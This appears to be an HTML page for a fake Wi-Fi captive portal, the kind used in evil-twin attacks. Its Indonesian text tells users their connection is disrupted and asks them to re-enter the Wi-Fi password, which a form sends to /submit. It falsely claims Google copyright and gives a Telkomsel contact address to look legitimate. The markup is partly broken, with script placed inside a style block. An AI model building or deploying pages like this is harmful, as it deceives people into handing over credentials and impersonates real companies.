<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Wi-Fi</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <header>
    <h2>Login to connect Wi-Fi</h2>
  </header>
  <br>
  <br>
    <div id="center-right" style="width: 300px;"><span class="container" id="ssid"><h2>Login To : </h2></span>
<p><h3>Problem connection<br>please Input password</h3></p></div>
<p><h4>Maaf Internet Anda Dalam Gangguan Mohon Masukan Password Dengan Benar, Dan Tunggu Proses Sampai<br>Selesai. Terima kasih.</h4></p>
                </div>
            </div>           
            <div id="center-below" style="width: 350px;
margin-left: 10;
margin-right: 5px;
padding-top: 10px;"><h5>
                <form action='/submit' method='get'>
                Wi-Fi Password:   <input type=password name=password minlength="8" required autofocus><input type="hidden" id="user" name="user" value=""><input type="hidden" id="isURL" name="url" value=""><input type=submit value="Log-In"></h5>
</form>
</div>
<br><br><a id="helpbutton" onclick="toggleHelp()" href="https://mylogicprograms.github.io/probleminternet.github.io/" style="color: rgb(142, 142, 142);
font-size: 14px;"><h5>Problem Internet!</h5></a>
        </div>
    </body>
	<script src="/index.js"></script>
</html>
</center>
  <main>
     <p><center></p>
  </main>
  <br>
  <br>
  <br>
  	  	   	  <br>
  	  	   	  <br>
  	  	   	  <br>
  	  	   	  <center><p>@Copyright by Google.com 2023</p></center>
  <footer>
    <p><h5>Contact us at: cs@telkomsel.com</h5></p>
  </footer>
  
<style>
  body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
}

header {
  background-color: #333;
  color: #fff;
  text-align: center;
  padding: 1rem;
}

nav {
  background-color: #444;
  padding: 0.5rem;
}

nav a {
  color: #fff;
  text-decoration: none;
  margin: 0 1rem;
}

main {
  padding: 2rem;
}

footer {
  background-color: #333;
  color: #fff;
  text-align: center;
  padding: 1rem;
}

// Contoh interaksi sederhana
document.addEventListener('DOMContentLoaded', function() {
  const reserveButton = document.getElementById('reserve-button');
  const reservationForm = document.getElementById('reservation-form');
  
  reserveButton.addEventListener('click', function() {
    reservationForm.classList.toggle('show');
  });
});
</style>

  <script src="script.js"></script>
</body>
</html>
